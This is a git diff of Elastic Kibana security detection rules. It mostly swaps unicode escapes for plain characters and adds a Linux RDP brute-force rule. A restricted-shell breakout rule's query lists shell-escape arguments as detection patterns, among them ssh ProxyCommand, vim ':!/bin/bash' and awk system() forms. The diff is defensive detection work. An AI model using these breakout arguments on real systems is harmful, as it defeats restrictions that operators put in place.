a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_106.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement with MMC", - "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port \u003e= 49152 and\n destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", + "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port >= 49152 and\n destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", "references": [ "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" ], @@ -102,7 +102,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -124,7 +124,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_1.json b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_1.json index e0fcbb34d32..d7638db6f6c 100644 --- a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_1.json +++ b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_1.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Successful Linux RDP Brute Force Attack Detected", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n```\nFor this detection rule no additional audit rules are required to be added to the integration. \n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n```\nFor this detection rule no additional audit rules are required to be added to the integration. \n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "sequence by host.id, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal : \"*rdp*\" and event.outcome == \"failure\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal : \"*rdp*\" and event.outcome == \"success\"] | tail 1\n", "related_integrations": [ { @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "521fbe5c-a78d-4b6b-a323-f978b0e4c4c0", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n```\nFor this detection rule no additional audit rules are required to be added to the integration.\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n```\nFor this detection rule no additional audit rules are required to be added to the integration.\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_2.json b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_2.json index 875f9bc636d..c96bdd0ca12 100644 --- a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_2.json +++ b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_2.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_3.json b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_3.json index 61101ee8f68..c6d658ce9c0 100644 --- a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_3.json +++ b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_3.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_4.json b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_4.json index 6b8af30cff9..35bf532510e 100644 --- a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_4.json +++ b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_4.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_5.json b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_5.json new file mode 100644 index 00000000000..2b6f01ceb78 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_5.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeatedly attempting various username and password combinations to gain unauthorized access to a remote computer via RDP, and if successful, the potential impact can include unauthorized control over the compromised system, data theft, or the ability to launch further attacks within the network, jeopardizing the security and confidentiality of the targeted system and potentially compromising the entire network infrastructure. This rule identifies multiple consecutive authentication failures targeting a specific user account within a short time interval, followed by a successful authentication.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Successful Linux RDP Brute Force Attack Detected", + "query": "sequence by host.id, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal : \"*rdp*\" and event.outcome == \"failure\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal : \"*rdp*\" and event.outcome == \"success\"] | tail 1\n", + "related_integrations": [ + { + "integration": "auditd", + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.terminal", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "related.user", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "521fbe5c-a78d-4b6b-a323-f978b0e4c4c0", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_102.json b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_102.json index c7e157b8750..4af991a9a40 100644 --- a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_102.json +++ b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_103.json b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_103.json index 5cd2f3cbd63..2450011a3fe 100644 --- a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_103.json +++ b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_104.json b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_104.json index d51f93c3636..454c04e0e44 100644 --- a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_104.json +++ b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_205.json b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_205.json index 1b7f7f4fb79..df0729d1a9e 100644 --- a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_205.json +++ b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_205.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_103.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_103.json index d5aef0c93eb..83b57d67d48 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_103.json @@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n (\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n (process.parent.name in (\"byebug\",\"git\",\"ftp\",\"strace\")) or\n\n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args in (\"spawn /bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", \"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;bash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;dash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/sh 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/bash 0\u003c\u00262 1\u003e\u00262\", \"ProxyCommand=;/bin/dash 0\u003c\u00262 1\u003e\u00262\")) or\n (process.parent.name in (\"nawk\", \"mawk\", \"awk\", \"gawk\") and process.parent.args : \"BEGIN {system(*)}\")\n )\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n (\n /* launch shells from unusual process */\n (process.name == \"capsh\" and process.args == \"--\") or\n\n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"sh\", \"dash\",\"ash\") and\n (process.parent.name in (\"byebug\",\"git\",\"ftp\",\"strace\")) or\n\n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n ) or\n\n /* shells specified in args */\n (process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") and\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n )\n ) or\n (process.name == \"busybox\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\") )or\n (process.name == \"env\" and process.args_count == 2 and process.args in (\"/bin/sh\", \"/bin/bash\", \"/bin/dash\", \"/bin/ash\", \"sh\", \"bash\", \"dash\", \"ash\")) or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args in (\":!/bin/bash\", \":!/bin/sh\", \":!bash\", \":!sh\")) or\n (process.parent.name in (\"c89\",\"c99\", \"gcc\") and process.parent.args in (\"sh,-s\", \"bash,-s\", \"dash,-s\", \"ash,-s\", \"/bin/sh,-s\", \"/bin/bash,-s\", \"/bin/dash,-s\", \"/bin/ash,-s\") and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args in (\"spawn /bin/sh;interact\", \"spawn /bin/bash;interact\", \"spawn /bin/dash;interact\", \"spawn sh;interact\", \"spawn bash;interact\", \"spawn dash;interact\")) or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args in (\"\\\\!*sh\", \"\\\\!*bash\", \"\\\\!*dash\", \"\\\\!*/bin/sh\", \"\\\\!*/bin/bash\", \"\\\\!*/bin/dash\")) or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args in (\"ProxyCommand=;sh 0<&2 1>&2\", \"ProxyCommand=;bash 0<&2 1>&2\", \"ProxyCommand=;dash 0<&2 1>&2\", \"ProxyCommand=;/bin/sh 0<&2 1>&2\", \"ProxyCommand=;/bin/bash 0<&2 1>&2\", \"ProxyCommand=;/bin/dash 0<&2 1>&2\")) or\n (process.parent.name in (\"nawk\", \"mawk\", \"awk\", \"gawk\") and process.parent.args : \"BEGIN {system(*)}\")\n )\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -99,7 +99,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_104.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_104.json index 8d48f5cd68d..8fd72fd4743 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_104.json @@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the 